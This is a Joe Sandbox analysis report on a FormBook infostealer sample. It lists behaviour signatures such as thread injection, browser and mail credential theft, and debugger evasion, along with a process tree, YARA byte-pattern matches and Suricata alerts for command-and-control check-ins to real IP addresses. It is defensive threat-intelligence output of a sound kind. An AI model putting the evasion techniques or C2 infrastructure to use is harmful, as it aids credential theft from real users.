Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
foljNJ4bug.exe

Overview

General Information

Sample name:foljNJ4bug.exe
renamed because original name is a hash value
Original sample name:bee1b254cca057d92d1ee189f1e8b02aea25826f7be053f788c047acc4d916ab.exe
Analysis ID:1530706
MD5:7d4f32d00ec594fd95e2cd5915940bc5
SHA1:df512f8cd6aae0abc1401f69d4bec39d65dafac2
SHA256:bee1b254cca057d92d1ee189f1e8b02aea25826f7be053f788c047acc4d916ab
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • foljNJ4bug.exe (PID: 64 cmdline: "C:\Users\user\Desktop\foljNJ4bug.exe" MD5: 7D4F32D00EC594FD95E2CD5915940BC5)
    • svchost.exe (PID: 6436 cmdline: "C:\Users\user\Desktop\foljNJ4bug.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YKSXcXcWryn.exe (PID: 4324 cmdline: "C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sc.exe (PID: 1484 cmdline: "C:\Windows\SysWOW64\sc.exe" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • YKSXcXcWryn.exe (PID: 5788 cmdline: "C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5672 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.4572880167.0000000004F80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.4572880167.0000000004F80000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x9016a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x781a9:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.4568347661.0000000002B70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4568347661.0000000002B70000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bec0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2274511503.00000000039A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dfd3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16012:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2edd3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16e12:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\foljNJ4bug.exe", CommandLine: "C:\Users\user\Desktop\foljNJ4bug.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\foljNJ4bug.exe", ParentImage: C:\Users\user\Desktop\foljNJ4bug.exe, ParentProcessId: 64, ParentProcessName: foljNJ4bug.exe, ProcessCommandLine: "C:\Users\user\Desktop\foljNJ4bug.exe", ProcessId: 6436, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\foljNJ4bug.exe", CommandLine: "C:\Users\user\Desktop\foljNJ4bug.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\foljNJ4bug.exe", ParentImage: C:\Users\user\Desktop\foljNJ4bug.exe, ParentProcessId: 64, ParentProcessName: foljNJ4bug.exe, ProcessCommandLine: "C:\Users\user\Desktop\foljNJ4bug.exe", ProcessId: 6436, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-10T12:50:54.115454+020020507451Malware Command and Control Activity Detected192.168.2.661449156.242.132.8280TCP
            2024-10-10T12:51:29.053387+020020507451Malware Command and Control Activity Detected192.168.2.661251156.242.132.8280TCP
            2024-10-10T12:52:00.340822+020020507451Malware Command and Control Activity Detected192.168.2.6613913.33.130.19080TCP
            2024-10-10T12:52:14.355915+020020507451Malware Command and Control Activity Detected192.168.2.66139638.47.233.6580TCP
            2024-10-10T12:52:27.709824+020020507451Malware Command and Control Activity Detected192.168.2.661401188.114.97.380TCP
            2024-10-10T12:52:42.511060+020020507451Malware Command and Control Activity Detected192.168.2.661405197.189.237.18680TCP
            2024-10-10T12:52:55.875893+020020507451Malware Command and Control Activity Detected192.168.2.66141067.223.117.18980TCP
            2024-10-10T12:53:09.154942+020020507451Malware Command and Control Activity Detected192.168.2.6614143.33.130.19080TCP
            2024-10-10T12:53:22.612007+020020507451Malware Command and Control Activity Detected192.168.2.661418217.70.184.5080TCP
            2024-10-10T12:53:36.170474+020020507451Malware Command and Control Activity Detected192.168.2.66142345.33.18.4480TCP
            2024-10-10T12:53:50.392877+020020507451Malware Command and Control Activity Detected192.168.2.66142754.67.42.14580TCP
            2024-10-10T12:54:04.546296+020020507451Malware Command and Control Activity Detected192.168.2.661431172.67.181.15080TCP
            2024-10-10T12:54:17.974077+020020507451Malware Command and Control Activity Detected192.168.2.6614353.33.130.19080TCP
            2024-10-10T12:54:31.416958+020020507451Malware Command and Control Activity Detected192.168.2.661440217.70.184.5080TCP
            2024-10-10T12:54:44.559896+020020507451Malware Command and Control Activity Detected192.168.2.6614443.33.130.19080TCP
            2024-10-10T12:54:58.773482+020020507451Malware Command and Control Activity Detected192.168.2.661448208.91.197.2780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-10T12:50:54.115454+020028554651A Network Trojan was detected192.168.2.661449156.242.132.8280TCP
            2024-10-10T12:51:29.053387+020028554651A Network Trojan was detected192.168.2.661251156.242.132.8280TCP
            2024-10-10T12:52:00.340822+020028554651A Network Trojan was detected192.168.2.6613913.33.130.19080TCP
            2024-10-10T12:52:14.355915+020028554651A Network Trojan was detected192.168.2.66139638.47.233.6580TCP
            2024-10-10T12:52:27.709824+020028554651A Network Trojan was detected192.168.2.661401188.114.97.380TCP
            2024-10-10T12:52:42.511060+020028554651A Network Trojan was detected192.168.2.661405197.189.237.18680TCP
            2024-10-10T12:52:55.875893+020028554651A Network Trojan was detected192.168.2.66141067.223.117.18980TCP
            2024-10-10T12:53:09.154942+020028554651A Network Trojan was detected192.168.2.6614143.33.130.19080TCP
            2024-10-10T12:53:22.612007+020028554651A Network Trojan was detected192.168.2.661418217.70.184.5080TCP
            2024-10-10T12:53:36.170474+020028554651A Network Trojan was detected192.168.2.66142345.33.18.4480TCP
            2024-10-10T12:53:50.392877+020028554651A Network Trojan was detected192.168.2.66142754.67.42.14580TCP
            2024-10-10T12:54:04.546296+020028554651A Network Trojan was detected192.168.2.661431172.67.181.15080TCP
            2024-10-10T12:54:17.974077+020028554651A Network Trojan was detected192.168.2.6614353.33.130.19080TCP
            2024-10-10T12:54:31.416958+020028554651A Network Trojan was detected192.168.2.661440217.70.184.5080TCP
            2024-10-10T12:54:44.559896+020028554651A Network Trojan was detected192.168.2.6614443.33.130.19080TCP
            2024-10-10T12:54:58.773482+020028554651A Network Trojan was detected192.168.2.661448208.91.197.2780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-10T12:51:52.693114+020028554641A Network Trojan was detected192.168.2.6613873.33.130.19080TCP
            2024-10-10T12:51:55.238418+020028554641A Network Trojan was detected192.168.2.6613893.33.130.19080TCP
            2024-10-10T12:51:57.785486+020028554641A Network Trojan was detected192.168.2.6613903.33.130.19080TCP
            2024-10-10T12:52:06.773065+020028554641A Network Trojan was detected192.168.2.66139238.47.233.6580TCP
            2024-10-10T12:52:09.228881+020028554641A Network Trojan was detected192.168.2.66139338.47.233.6580TCP
            2024-10-10T12:52:12.398073+020028554641A Network Trojan was detected192.168.2.66139438.47.233.6580TCP
            2024-10-10T12:52:19.876918+020028554641A Network Trojan was detected192.168.2.661398188.114.97.380TCP
            2024-10-10T12:52:22.412679+020028554641A Network Trojan was detected192.168.2.661399188.114.97.380TCP
            2024-10-10T12:52:24.994533+020028554641A Network Trojan was detected192.168.2.661400188.114.97.380TCP
            2024-10-10T12:52:34.662818+020028554641A Network Trojan was detected192.168.2.661402197.189.237.18680TCP
            2024-10-10T12:52:37.209627+020028554641A Network Trojan was detected192.168.2.661403197.189.237.18680TCP
            2024-10-10T12:52:39.821642+020028554641A Network Trojan was detected192.168.2.661404197.189.237.18680TCP
            2024-10-10T12:52:48.237776+020028554641A Network Trojan was detected192.168.2.66140767.223.117.18980TCP
            2024-10-10T12:52:50.784546+020028554641A Network Trojan was detected192.168.2.66140867.223.117.18980TCP
            2024-10-10T12:52:53.309675+020028554641A Network Trojan was detected192.168.2.66140967.223.117.18980TCP
            2024-10-10T12:53:01.475921+020028554641A Network Trojan was detected192.168.2.6614113.33.130.19080TCP
            2024-10-10T12:53:04.031121+020028554641A Network Trojan was detected192.168.2.6614123.33.130.19080TCP
            2024-10-10T12:53:06.556866+020028554641A Network Trojan was detected192.168.2.6614133.33.130.19080TCP
            2024-10-10T12:53:15.217816+020028554641A Network Trojan was detected192.168.2.661415217.70.184.5080TCP
            2024-10-10T12:53:17.473803+020028554641A Network Trojan was detected192.168.2.661416217.70.184.5080TCP
            2024-10-10T12:53:20.094127+020028554641A Network Trojan was detected192.168.2.661417217.70.184.5080TCP
            2024-10-10T12:53:28.220785+020028554641A Network Trojan was detected192.168.2.66141945.33.18.4480TCP
            2024-10-10T12:53:30.883677+020028554641A Network Trojan was detected192.168.2.66142045.33.18.4480TCP
            2024-10-10T12:53:33.603949+020028554641A Network Trojan was detected192.168.2.66142145.33.18.4480TCP
            2024-10-10T12:53:42.473797+020028554641A Network Trojan was detected192.168.2.66142454.67.42.14580TCP
            2024-10-10T12:53:44.770072+020028554641A Network Trojan was detected192.168.2.66142554.67.42.14580TCP
            2024-10-10T12:53:47.939826+020028554641A Network Trojan was detected192.168.2.66142654.67.42.14580TCP
            2024-10-10T12:53:56.710210+020028554641A Network Trojan was detected192.168.2.661428172.67.181.15080TCP
            2024-10-10T12:53:59.179256+020028554641A Network Trojan was detected192.168.2.661429172.67.181.15080TCP
            2024-10-10T12:54:01.612140+020028554641A Network Trojan was detected192.168.2.661430172.67.181.15080TCP
            2024-10-10T12:54:10.137105+020028554641A Network Trojan was detected192.168.2.6614323.33.130.19080TCP
            2024-10-10T12:54:12.772246+020028554641A Network Trojan was detected192.168.2.6614333.33.130.19080TCP
            2024-10-10T12:54:15.324852+020028554641A Network Trojan was detected192.168.2.6614343.33.130.19080TCP
            2024-10-10T12:54:23.669343+020028554641A Network Trojan was detected192.168.2.661436217.70.184.5080TCP
            2024-10-10T12:54:26.849290+020028554641A Network Trojan was detected192.168.2.661437217.70.184.5080TCP
            2024-10-10T12:54:29.665921+020028554641A Network Trojan was detected192.168.2.661438217.70.184.5080TCP
            2024-10-10T12:54:36.938797+020028554641A Network Trojan was detected192.168.2.6614413.33.130.19080TCP
            2024-10-10T12:54:39.486002+020028554641A Network Trojan was detected192.168.2.6614423.33.130.19080TCP
            2024-10-10T12:54:42.034163+020028554641A Network Trojan was detected192.168.2.6614433.33.130.19080TCP
            2024-10-10T12:54:50.449011+020028554641A Network Trojan was detected192.168.2.661445208.91.197.2780TCP
            2024-10-10T12:54:52.965963+020028554641A Network Trojan was detected192.168.2.661446208.91.197.2780TCP
            2024-10-10T12:54:55.517982+020028554641A Network Trojan was detected192.168.2.661447208.91.197.2780TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: foljNJ4bug.exeAvira: detected
            Source: foljNJ4bug.exeVirustotal: Detection: 52%Perma Link
            Source: foljNJ4bug.exeReversingLabs: Detection: 71%
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4572880167.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568347661.0000000002B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2274511503.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2274082509.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568673306.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568820851.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4570541782.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2275048061.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: foljNJ4bug.exeJoe Sandbox ML: detected
            Source: foljNJ4bug.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YKSXcXcWryn.exe, 00000003.00000000.2198124643.000000000034E000.00000002.00000001.01000000.00000005.sdmp, YKSXcXcWryn.exe, 00000008.00000000.2342357294.000000000034E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: foljNJ4bug.exe, 00000000.00000003.2150201716.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, foljNJ4bug.exe, 00000000.00000003.2149834312.0000000004940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2274615489.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185891967.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184329648.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2274615489.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000004.00000003.2274285508.000000000322F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000003.2276853767.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4570625529.0000000003580000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4570625529.000000000371E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sc.pdbUGP source: svchost.exe, 00000002.00000003.2242446426.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2242408515.000000000341A000.00000004.00000020.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000003.2213398487.000000000062B000.00000004.00000020.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000003.2660649111.0000000000639000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: foljNJ4bug.exe, 00000000.00000003.2150201716.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, foljNJ4bug.exe, 00000000.00000003.2149834312.0000000004940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2274615489.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185891967.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184329648.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2274615489.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 00000004.00000003.2274285508.000000000322F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000003.2276853767.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4570625529.0000000003580000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4570625529.000000000371E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sc.pdb source: svchost.exe, 00000002.00000003.2242446426.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2242408515.000000000341A000.00000004.00000020.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000003.2213398487.000000000062B000.00000004.00000020.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000003.2660649111.0000000000639000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sc.exe, 00000004.00000002.4568890860.000000000312E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4571993110.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000000.2343067255.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2565816481.000000000081C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sc.exe, 00000004.00000002.4568890860.000000000312E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4571993110.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000000.2343067255.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2565816481.000000000081C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B8C320 FindFirstFileW,FindNextFileW,FindClose,4_2_02B8C320
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then xor eax, eax4_2_02B79B80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then pop edi4_2_02B7DEC3
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then mov ebx, 00000004h4_2_033D04E0

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61402 -> 197.189.237.186:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61412 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61392 -> 38.47.233.65:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61419 -> 45.33.18.44:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61394 -> 38.47.233.65:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61390 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61440 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61425 -> 54.67.42.145:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61420 -> 45.33.18.44:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61447 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61438 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61440 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61403 -> 197.189.237.186:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61424 -> 54.67.42.145:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61436 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61429 -> 172.67.181.150:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61411 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61251 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61396 -> 38.47.233.65:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61393 -> 38.47.233.65:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61441 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61396 -> 38.47.233.65:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61418 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61409 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61404 -> 197.189.237.186:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61418 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61410 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61435 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61387 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61428 -> 172.67.181.150:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61443 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61435 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61410 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61407 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61391 -> 3.33.130.190:80
